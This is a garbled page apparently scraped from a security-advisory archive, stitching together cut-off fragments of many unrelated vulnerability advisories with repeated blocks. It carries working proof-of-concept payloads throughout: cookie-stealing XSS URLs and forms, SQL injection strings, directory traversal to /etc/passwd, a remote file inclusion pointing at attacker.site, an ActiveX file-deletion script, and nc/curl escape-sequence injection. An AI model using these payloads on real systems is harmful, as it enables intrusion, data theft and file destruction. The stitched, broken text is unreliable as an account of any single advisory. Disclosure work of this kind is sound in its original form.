Next Page >>
Proof of Concept
------------------------------------------------------------------------------------------------------------------------
These vulnerabilities were discovered and researched by Andrew Horton
(urbanadventurer) from MorningStar Security.
8. Technical Description / Proof of Concept
------------------------------------------------------------------------------------------------------------------------
8.1 Introduction
Many past advisories have been published for Cute News. An unpatched LFI
Steps to reproduce:
1. Generate a POST request that breaks the JSON string while sending an E-Mail
2. Within that request, embed some JS code
Proof of Concept:
<html>
<head>
<title>PoC for Bug 24553 CVE-2013-1646</title>
</head>
<body>
This vulnerability was discovered and researched by Damian Frizza from
Core Security Technologies during Bugweek 2009 [1].
8. *Technical Description / Proof of Concept Code*
8.1. *Excel / Word - OfficeArtSpgr container - invalid recType value
leads to attacker controlled pointer usage [MSRC 9368]*
1) Multiple Cross-Site Scripting (XSS) in Pligg CMS: CVE-2012-2436
1.1 Input passed via the arbitrary (any) GET parameter to /admin/admin_index.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in administrator's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/admin/admin_index.php?action=move&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
http://[host]/admin/admin_index.php?action=minimize&any_get_parameter_name_here=%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1.2 Input passed via the "karma_username" POST parameter to module.php is not properly sanitised before being returned to the user.
0x7c9216a1 call 0x7c920684
0x7c9216a6 mov eax,[ebp+0xc]
0x7c9216a9 mov ecx,[ebp+0x8]
Proof of Concept:
The following HTTP request will crash the vulnerable Nero MediaHome server remotely:
GET /[A * 500000] HTTP/1.1
HOST: somehost.com
ACCEPT: */*
----------------------------------------------------------------------------------------------
These vulnerabilities were discovered and researched by Andrew Horton
(urbanadventurer) from MorningStar Security.
8. Technical Description / Proof of Concept
----------------------------------------------------------------------------------------------
8.1 Introduction
Open Auto Classifieds powers many car dealer websites. No advisories for
*Credits*
This vulnerability was discovered by Lucas Lavarello from the CORE
Security Consulting Services (CORE SCS) team.
*Technical Description / Proof of Concept Code*
The standard protocol that AIM clients use to communicate is called OSCAR
(Open System for CommunicAtion in Realtime), which is a closed protocol
also used by AOL's secondary Instant Messaging client, ICQ (I Seek You).
On top of the OSCAR protocol, AIM clients have implemented support for
*Credits*
This vulnerability was discovered by Lucas Lavarello from the CORE
Security Consulting Services (CORE SCS) team.
*Technical Description / Proof of Concept Code*
The standard protocol that AIM clients use to communicate is called OSCAR
(Open System for CommunicAtion in Realtime), which is a closed protocol
also used by AOL's secondary Instant Messaging client, ICQ (I Seek You).
On top of the OSCAR protocol, AIM clients have implemented support for
1) Cross-Site Scripting (XSS) in All-in-One Event Calendar Plugin for WordPress: CVE-2012-1835
1.1 Input passed via the "title" GET parameter to /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of the affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://wp/wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget-form.php?title[id]=%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E
1.2 Input passed via the "args", "title", "before_title", "after_title" GET parameters to /wp-content/plugins/all-in-one-event-calendar/app/view/agenda-widget.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of the affected website.
1) Local File Inclusion in LEPTON: CVE-2012-0998
Input passed via the "language" POST parameter to /account/preferences.php is not properly verified before being saved in $_SESSION['language'] when user updates preferences.
Thereafter $_SESSION['language'] is used in include() function and can be exploited to include arbitrary local files via directory traversal and URL-encoded NULL bytes.
The following PoC (Proof of Concept) demostrates the vulnerability:
POST /account/preferences.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
1) SQL Injection in OrangeHRM: CVE-2012-1506
1.1 Input passed via the "hspSummaryId" GET parameter to /plugins/ajaxCalls/haltResumeHsp.php is not properly sanitised before being used in SQL "UPDATE" query. This vulnerability can be exploited by time-based blind SQL injection techniques to reveal sensitive information from the database.
The following PoC (Proof of Concept) will cause a delay of the script execution if MySQL server version is 5.*:
http://[host]/plugins/ajaxCalls/haltResumeHsp.php?newHspStatus=1&empId=2&hspSummaryId=%27%20OR%20%28select%20IF%28%28select%20mid%28version%28%29,1,1%29%29=5,%28select%20BENCHMARK%281000000,ENCODE%28%22hello%22,%22goodbye%22%29%29%29,%272%27%29%29%20--%202
Successful exploitation of this vulnerability requires attacker to be registered and logged-in.
O 0 LastErr 00000000 ERROR_SUCCESS
EFL 00250202 (NO,NB,NE,A,NS,PO,GE,G)
...
The rest is omitted.
For more information see Proof of Concept screen shot.
Proof of Concept code:
http://www.kil13r.info/data/aaa.zip
Proof of Concept screen shot:
1) Cross-Site Scripting (XSS) in Dotclear: CVE-2012-1039
1.1 Input passed via the "login_data" POST parameter to /admin/auth.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]/admin/auth.php" method="post">
<input type="hidden" name="new_pwd" value="1" />
<input type="hidden" name="new_pwd_c" value="2" />
echo -en "GET /\x1b]2;owned?\x07\x0a\x0d\x0a\x0d" > payload
nc localhost 80 < payload
C) "Cherokee" log escape sequence injection
The following Proof Of Concept can be used in order to verify the
vulnerability.
curl -kis http://localhost/%1b%5d%32%3b%6f%77%6e%65%64%07%0a
D) "thttpd" log escape sequence injection
1) SQL Injection in AContent: CVE-2012-5167
1.1 The vulnerability exists due to insufficient sanitation of input data in the "field" HTTP POST parameter in /course_category/index_inline_editor_submit.php. A remote unauthenticated user can execute arbitrary SQL commands in application`s database.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]/course_category/index_inline_editor_submit.php" method="post">
<input type="hidden" name="field" value="category_name-1 AND 1=(select min(@a:=1)from (select 1 union select 2)k group by (select concat(@@version,0x0,@a:=(@a+1)%2)))" />
<input type="hidden" name="value" value="1" />
vcllo!Region::operator=+0x12:
6b44f247 ff4004 inc dword ptr [eax+4] ds:0023:6cd6e986=db4a6001
Proof of Concept
Please see the attached file: <a href="https://www.htbridge.com/advisory/HTB23106-LibreOffice-3.5.5.3.rar">HTB23106-LibreOffice-3.5.5.3.rar</a>
Password: high-tech-bridge
1.2 Null pointer dereference error was found in svxcorelo.dll while processing the ODG (Drawing document) files. A remote attacker can create a specially crafted ODG file, trick a user into opening that file and terminate the application.
0x0041e237 mov dl,[eax]
0x0041e239 inc eax
0x0041e23a cmp dl,bl
Proof of Concept:
The following HTTP request will crash the vulnerable Firefly server remotely:
GET / HTTP/1.1
Host: vulnhost.local
User-Agent: Mozilla/5.0 (Windows; U)
7. *Credits*
This vulnerability was discovered by Nicolas Economou from Core Security
Technologies. Technical analysis and proof-of-concept tools were
developed by Nicolas Economou and Diego Juarez from Core's Exploit
Writers Team.
8. *Technical Description / Proof of Concept Code*
Olea and Nahuel Riva from Core Security Technologies. Publication of
this advisory was coordinated by Carlos Sarraute from Core Security
Advisories team.
8. *Technical Description / Proof of Concept Code*
XnView is prone to a security vulnerability when processing MBM files.
The version used in our tests in XnView 1.97.4 running on Windows 2000
SP4. By enticing the user of XnView to open a specially crafted file, a
remote attacker may exploit this vulnerability to gain arbitrary code
This vulnerability was discovered and researched by Damian Frizza from
Core Security Technologies during Bugweek 2009 [1].
8. *Technical Description / Proof of Concept Code*
An exploitable vulnerability was found in Windows Movie Maker, which can
be triggered by a remote attacker by sending a specially crafted .MSWMM
file and enticing the user to open it. This vulnerability results in a
write access violation and can lead to remote code execution.
After the successful installation of WordPress, a malicious user can inject
malicious PHP code via the WordPress Themes editor. In addition, with control
of the database store, malicious Javascript can be injected into the content
of WordPress yielding persistent Cross Site Scripting.
Proof of Concept:
Servers Involved
A.B.C.D = Target WordPress Web Server
W.X.Y.Z = Malicious User's MySQL Instance
--- CUT ---
First column is the offset so vulnerability is executed like it should be
(negative offsets). Second column is byte which is read out-of-bound.
How to run this very primitive Proof of Concept?
$ gcc p_cve-2011-4362.c -o p_cve-2011-4362
$ ./p_cve-2011-4362
...::: -=[ Proof of Concept for CVE-2011-4362 (by Adam 'pi3' Zabrocki) ]=- :::...
1) Multiple Remote File Inclusion in Newscoop: CVE-2012-1933
1.1 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /include/phorum_load.php is not properly verified before being used in require_once() function and can be exploited to include arbitrary remote files.
The following PoC (Proof of Concept) demonstrates the vulnerability:
http://[host]/include/phorum_load.php?GLOBALS[g_campsiteDir]=http://attacker.site/file%00
1.2 Input passed via the "GLOBALS[g_campsiteDir]" GET parameter to /conf/install_conf.php is not properly verified before being used in require_once() function and can be exploited to include arbitrary remote files.
The WebCacheCleaner ActiveX Control provides the method FileDelete()
which, working as advertised, allows the attacker to delete arbitrary
files on the client.
=== Proof of Concept 1 (VBScript) ===
dim o
Set o = CreateObject("MLWebCacheCleaner.WebCacheCleaner.1")
o.FileDelete("c:\bla\bla")
This vulnerability was discovered and researched by Jorge Luis Alvarez
Medina from Core Security Consulting Services (SCS). Additional research
was made by Federico Muttis from Core Security Exploit Writers Team (EWT).
8. *Technical Description / Proof of Concept Code*
Internet Explorer uses a feature known as URL Security Zones [2], which
defines a set of privileges for Web sites and applications depending on
their apparent level of trustworthiness. The zones available in the
product include:
Cross Site Script Redirection:
The "returnUrl" GET-request within ViewIssue.jspa is not sanitizing
user-input in a sufficient way allowing the Data URI scheme to be
used in an attack.
Proof of Concept URL:
ViewIssue.jspa?id=[VALID_ID]&watch=true&returnUrl=data:text/html,<script>alert(0)</script>
Non-Persistent Script Injection:
The "returnUrl" GET-request within default.jspa is not sanitizing
1) Multiple Cross-Site Scripting (XSS) in osCmax: CVE-2012-1664
1.1 Input passed via the "username" POST parameter to /admin/login.php is not properly sanitised before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in user's browser session in context of affected website.
The following PoC (Proof of Concept) demonstrates the vulnerability:
<form action="http://[host]/admin/login.php?action=process" method="post" name="main" id="main">
<input type="hidden" name="username" value="'<script>alert(document.cookie);</script>">
<input type="hidden" name="password" value="">
1) Multiple Local File Inclusion vulnerabilities in OpenEMR
1.1 Input passed via the "formname" GET parameter to /contrib/acog/print_form.php is not properly verified before being used to include local files.
This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.
The following PoC (Proof of Concept) demostrates the vulnerability:
http://[host]/contrib/acog/print_form.php?formname=../../../etc/passwd%00
1.2 Input passed via the "formname" GET parameter to /interface/patient_file/encounter/load_form.php, /interface/patient_file/encounter/view_form.php and /interface/patient_file/encounter/trend_form.php is not properly verified before being used to include local files.
This can be exploited to include local files via directory traversal sequences and URL-encoded NULL bytes.
Since more then enough \..\..\ will just bring the path to the disk root, the
attacker can choose any location on the disk to write the file to. The file can
for example overwrite a critical system file, or create a file in the Autostart
folder.
See Proof of Concept exploit at the bottom of this advisory.
2. Remote FTP DoS
When connecting to a malformed FTP, the Unreal Commander sends a CWD /
command. If the malformed FTP replies with a "550 CWD Operation not permitted"
These vulnerabilities were discovered and researched by Oren Isacson
from Core Security Technologies.
7. *Technical Description / Proof of Concept Code*
Several buffer overflows have been found in HP OpenView Network Node
Manager, which can be exploited to remotely compromise a user's system.
While working on an exploit for the vulnerabilities disclosed in the
Next Page>>
|
